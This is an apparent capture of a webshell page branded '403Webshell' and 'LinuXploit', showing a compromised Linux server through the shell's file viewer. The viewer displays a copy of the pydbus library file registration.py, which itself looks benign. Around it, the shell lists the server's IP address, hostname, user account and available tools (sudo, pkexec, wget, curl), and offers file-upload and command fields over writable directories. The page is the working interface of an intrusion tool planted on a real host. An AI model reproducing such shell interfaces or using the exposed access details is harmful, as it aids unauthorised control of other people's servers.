- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 184.154.167.98  /  Your IP : 3.142.54.169
Web Server : Apache
System : Linux pink.dnsnetservice.com 4.18.0-553.22.1.lve.1.el8.x86_64 #1 SMP Tue Oct 8 15:52:54 UTC 2024 x86_64
User : puertode ( 1767)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3.6/site-packages/pydbus/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3.6/site-packages/pydbus/registration.py
from __future__ import print_function
import sys, traceback
from gi.repository import GLib, Gio
from . import generic
from .exitable import ExitableWithAliases
from functools import partial
from .method_call_context import MethodCallContext
from .error import error_registration
import logging

try:
	from inspect import signature, Parameter
except:
	from ._inspect3 import signature, Parameter

class ObjectWrapper(ExitableWithAliases("unwrap")):
	__slots__ = ["object", "outargs", "readable_properties", "writable_properties"]

	def __init__(self, object, interfaces):
		self.object = object

		self.outargs = {}
		for iface in interfaces:
			for method in iface.methods:
				self.outargs[iface.name + "." + method.name] = [arg.signature for arg in method.out_args]

		self.readable_properties = {}
		self.writable_properties = {}
		for iface in interfaces:
			for prop in iface.properties:
				if prop.flags & Gio.DBusPropertyInfoFlags.READABLE:
					self.readable_properties[iface.name + "." + prop.name] = prop.signature
				if prop.flags & Gio.DBusPropertyInfoFlags.WRITABLE:
					self.writable_properties[iface.name + "." + prop.name] = prop.signature

		for iface in interfaces:
			for signal in iface.signals:
				s_name = signal.name
				def EmitSignal(iface, signal):
					return lambda *args: self.SignalEmitted(iface.name, signal.name, GLib.Variant("(" + "".join(s.signature for s in signal.args) + ")", args))
				self._at_exit(getattr(object, signal.name).connect(EmitSignal(iface, signal)).__exit__)

		if "org.freedesktop.DBus.Properties" not in (iface.name for iface in interfaces):
			try:
				def onPropertiesChanged(iface, changed, invalidated):
					changed = {key: GLib.Variant(self.readable_properties[iface + "." + key], val) for key, val in changed.items()}
					args = GLib.Variant("(sa{sv}as)", (iface, changed, invalidated))
					self.SignalEmitted("org.freedesktop.DBus.Properties", "PropertiesChanged", args)
				self._at_exit(object.PropertiesChanged.connect(onPropertiesChanged).__exit__)
			except AttributeError:
				pass

	SignalEmitted = generic.signal()

	def call_method(self, connection, sender, object_path, interface_name, method_name, parameters, invocation):
		try:
			try:
				outargs = self.outargs[interface_name + "." + method_name]
				method = getattr(self.object, method_name)
			except KeyError:
				if interface_name == "org.freedesktop.DBus.Properties":
					if method_name == "Get":
						method = self.Get
						outargs = ["v"]
					elif method_name == "GetAll":
						method = self.GetAll
						outargs = ["a{sv}"]
					elif method_name == "Set":
						method = self.Set
						outargs = []
					else:
						raise
				else:
					raise

			sig = signature(method)

			kwargs = {}
			if "dbus_context" in sig.parameters and sig.parameters["dbus_context"].kind in (Parameter.POSITIONAL_OR_KEYWORD, Parameter.KEYWORD_ONLY):
				kwargs["dbus_context"] = MethodCallContext(invocation)

			result = method(*parameters, **kwargs)

			if len(outargs) == 0:
				invocation.return_value(None)
			elif len(outargs) == 1:
				invocation.return_value(GLib.Variant("(" + "".join(outargs) + ")", (result,)))
			else:
				invocation.return_value(GLib.Variant("(" + "".join(outargs) + ")", result))

		except Exception as e:
			logger = logging.getLogger(__name__)
			logger.exception("Exception while handling %s.%s()", interface_name, method_name)

			if error_registration.is_registered_exception(e):
				name = error_registration.get_dbus_name(e)
				invocation.return_dbus_error(name, str(e))
			else:
				logger.info("name is not registered")
				e_type = type(e).__name__
				if not "." in e_type:
					e_type = "unknown." + e_type

				invocation.return_dbus_error(e_type, str(e))

	def Get(self, interface_name, property_name):
		type = self.readable_properties[interface_name + "." + property_name]
		result = getattr(self.object, property_name)
		return GLib.Variant(type, result)

	def GetAll(self, interface_name):
		ret = {}
		for name, type in self.readable_properties.items():
			ns, local = name.rsplit(".", 1)
			if ns == interface_name:
				ret[local] = GLib.Variant(type, getattr(self.object, local))
		return ret

	def Set(self, interface_name, property_name, value):
		self.writable_properties[interface_name + "." + property_name]
		setattr(self.object, property_name, value)

class ObjectRegistration(ExitableWithAliases("unregister")):
	__slots__ = ()

	def __init__(self, bus, path, interfaces, wrapper, own_wrapper=False):
		if own_wrapper:
			self._at_exit(wrapper.__exit__)

		def func(interface_name, signal_name, parameters):
			bus.con.emit_signal(None, path, interface_name, signal_name, parameters)

		self._at_exit(wrapper.SignalEmitted.connect(func).__exit__)

		try:
			ids = [bus.con.register_object(path, interface, wrapper.call_method, None, None) for interface in interfaces]
		except TypeError as e:
			if str(e).startswith("argument vtable: Expected Gio.DBusInterfaceVTable"):
				raise Exception("GLib 2.46 is required to publish objects; it is impossible in older versions.")
			else:
				raise

		self._at_exit(lambda: [bus.con.unregister_object(id) for id in ids])

class RegistrationMixin:
	__slots__ = ()

	def register_object(self, path, object, node_info):
		if node_info is None:
			try:
				node_info = type(object).dbus
			except AttributeError:
				node_info = type(object).__doc__

		if type(node_info) != list and type(node_info) != tuple:
			node_info = [node_info]

		node_info = [Gio.DBusNodeInfo.new_for_xml(ni) for ni in node_info]
		interfaces = sum((ni.interfaces for ni in node_info), [])

		wrapper = ObjectWrapper(object, interfaces)
		return ObjectRegistration(self, path, interfaces, wrapper, own_wrapper=True)

Youez - 2016 - github.com/yon3zu
LinuXploit